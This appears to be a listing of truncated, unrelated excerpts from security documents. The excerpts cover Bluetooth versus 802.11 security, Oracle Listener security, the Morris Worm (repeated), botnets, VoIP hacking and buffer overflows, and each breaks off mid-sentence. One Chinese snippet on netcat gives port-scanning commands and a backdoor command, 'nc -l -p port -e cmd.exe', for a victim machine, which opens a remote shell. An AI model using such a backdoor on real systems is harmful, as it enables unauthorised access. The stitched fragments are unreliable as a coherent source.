Security Comparison: BluetoothTM Communications vs. 802.11 Thomas G. Xydis Ph.D. Simon Blake-Wilson Bluetooth Security Experts Group 11-10-2001 revised 2-1-2002 1.0 Introduction Several attacks on IEEE 802.11b have been described in the media [1]. I
oracle数据库监听器安全指南 One of the most misunderstood security issues with the Oracle Database is the security of the Listener. Generally, DBAs are not aware that an attacker can easily remotely manage the Listener and potentially effectively take control
Introduction On november 2, 1988 a new form of threat appeared with the Morris Worm, also known as the Internet Worm. This famous event caused heavy damages on the internet, by using two common unix programs, sendmail and fingerd. This was possible
A “botnet” consists of a network of compromised computers controlled by an attacker (“botmaster”). Recently botnets have become the root cause of many Internet attacks. To be well prepared for future attacks, it is not enough to study how to detect
Asterisk Hacking shows readers about a hacking technique they may not be aware of. It teaches the secrets the bad guys already know about stealing personal information through the most common, seemingly innocuous, highway into computer networks: the
The SANS Institute maintains a list of the "Top 10 Software Vulnerabilities." At the current time, over half of these vulnerabilities are exploitable by Buffer Overflow attacks, making this class of attack one of the most common and most dangerous w
NC的高级用法 3.1.端口的刺探: nc -vv ip port RIVER [192.168.0.198] 19190 (?) open //显示是否开放open 3.2.扫描器 nc -vv -w 5 ip port-port port nc -vv -z ip port-port port 这样扫描会留下大量的痕迹,系统管理员会额外小心 3.3. 后门 victim machine: //受害者的机器 nc -l -p port -e cmd.exe //win2000 nc -l -
On november 2, 1988 a new form of threat appeared with the Morris Worm, also known as the Internet Worm. This famous event caused heavy damages on the internet, by using two common unix programs, sendmail and fingerd. This was possible by exploiting